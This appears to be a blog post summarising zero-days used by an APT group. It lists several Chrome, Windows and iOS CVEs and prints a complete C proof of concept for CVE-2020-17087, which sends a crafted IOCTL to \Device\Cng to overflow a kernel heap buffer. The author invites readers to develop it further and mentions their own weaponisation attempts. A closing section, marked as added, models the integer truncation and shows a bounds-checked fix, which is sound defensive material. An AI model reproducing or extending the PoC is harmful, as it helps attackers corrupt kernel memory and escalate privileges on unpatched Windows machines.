Google: Sophisticated APT Group Burned 11 Zero-Days in Mass Spying Operation

Published: 2024/3/13

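A mysterious hacker group launched attacks using 11 zero-day vulnerabilities

I can't be bothered to write much more, so here are a few key points. Expand on them yourself.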


CVE-2020-15999 - Chrome FreeType heap buffer overflow;

CVE-2020-17087 - heap buffer overflow in Windows cng.sys;

CVE-2020-16009 - Chrome type confusion in TurboFan map deprecation

CVE-2020-16010 - heap buffer overflow in Chrome for Android

CVE-2020-27930 - Safari arbitrary stack read/write

CVE-2020-27950 - iOS XNU kernel memory disclosure

CVE-2020-27932 - iOS kernel type confusion with turnstiles

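Rant: people leave this alone and go mess around with all sorts of random stuff instead…
Windows: the PoC for CVE-2020-17087 is here; if you're interested, take it further from here.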

#pragma comment(lib, "ntdll")

#include <cstdio>
#include <windows.h>

int main() {
  HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
                            GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

  // CreateFileA reports failure with INVALID_HANDLE_VALUE, not NULL.
  if (hCng == INVALID_HANDLE_VALUE) {
    printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
    return 1;
  }

  printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);

  //
  // DataBufferSize overflows when used for allocating memory in
  // cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).
  //
  // In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2
  // bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.
  //
  CONST DWORD DataBufferSize = 0x2AAB;
  CONST DWORD IoctlSize = 4096 + DataBufferSize;
  BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);

  RtlZeroMemory(IoctlData, IoctlSize);

  *(DWORD*)    &IoctlData[0x00] = 0x1A2B3C4D;
  *(DWORD*)    &IoctlData[0x04] = 0x10400;
  *(DWORD*)    &IoctlData[0x08] = 1;
  *(ULONGLONG*)&IoctlData[0x10] = 0x100;
  *(DWORD*)    &IoctlData[0x18] = 3;
  *(ULONGLONG*)&IoctlData[0x20] = 0x200;
  *(ULONGLONG*)&IoctlData[0x28] = 0x300;
  *(ULONGLONG*)&IoctlData[0x30] = 0x400;
  *(DWORD*)    &IoctlData[0x38] = 0;
  *(ULONGLONG*)&IoctlData[0x40] = 0x500;
  *(ULONGLONG*)&IoctlData[0x48] = 0x600;
  *(DWORD*)    &IoctlData[0x50] = DataBufferSize; // OVERFLOW
  *(ULONGLONG*)&IoctlData[0x58] = 0x1000;
  *(ULONGLONG*)&IoctlData[0x60] = 0;
  RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
  RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);

  ULONG_PTR OutputBuffer = 0;
  DWORD BytesReturned;
  BOOL Status = DeviceIoControl(
    hCng,
    0x390400,
    IoctlData,
    IoctlSize,
    &OutputBuffer,
    sizeof(OutputBuffer),
    &BytesReturned,
    NULL
  );

  printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);

  HeapFree(GetProcessHeap(), 0, IoctlData);
  CloseHandle(hCng);

  return 0;
}

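I don't recommend using BCrypt: of the 10 I managed to write, 9 still blue-screened and 1 still wouldn't compile. I suggest following the original author's approach; at the very least, it worked for him.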
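The size calculation described in the PoC's comment, modelled in user-mode C next to a checked variant. This is an added example, not code from the original post or from cng.sys; the function names are hypothetical, and only the factor 6 and the 16-bit cast are taken from the comment.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical model of the flawed pattern from the PoC comment:
 * the allocation size is (uint16)(DataBufferSize * 6). */
uint16_t truncated_alloc_size(uint32_t data_size) {
    return (uint16_t)(data_size * 6u);
}

/* Bytes the formatter writes for the same input (no truncation). */
uint64_t bytes_written(uint32_t data_size) {
    return (uint64_t)data_size * 6u;
}

/* Hardened variant: refuse any input whose expanded size does not
 * fit the 16-bit length field instead of silently wrapping. */
bool checked_alloc_size(uint32_t data_size, uint16_t *out) {
    if (data_size > UINT16_MAX / 6u)
        return false;
    *out = (uint16_t)(data_size * 6u);
    return true;
}

/* Smallest input for which the allocation is shorter than the write. */
uint32_t first_unsafe_size(void) {
    for (uint32_t n = 0; n <= UINT16_MAX; n++)
        if (truncated_alloc_size(n) < bytes_written(n))
            return n;
    return 0;
}

int main(void) {
    const uint32_t samples[] = { 0x100, 0x2AAA, 0x2AAB, 0x4000 }; /* constructed */
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint16_t ok_size = 0;
        bool ok = checked_alloc_size(samples[i], &ok_size);
        printf("size=0x%04X alloc=0x%04X written=0x%05llX checked=%s\n",
               (unsigned)samples[i], (unsigned)truncated_alloc_size(samples[i]),
               (unsigned long long)bytes_written(samples[i]),
               ok ? "accepted" : "rejected");
    }
    printf("first unsafe size: 0x%X\n", (unsigned)first_unsafe_size());
    return 0;
}
```

The boundary search shows that 0x2AAB is the smallest length at which the 16-bit size wraps, so a bounds check at `UINT16_MAX / 6` (0x2AAA) closes the gap between the allocated and written sizes.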
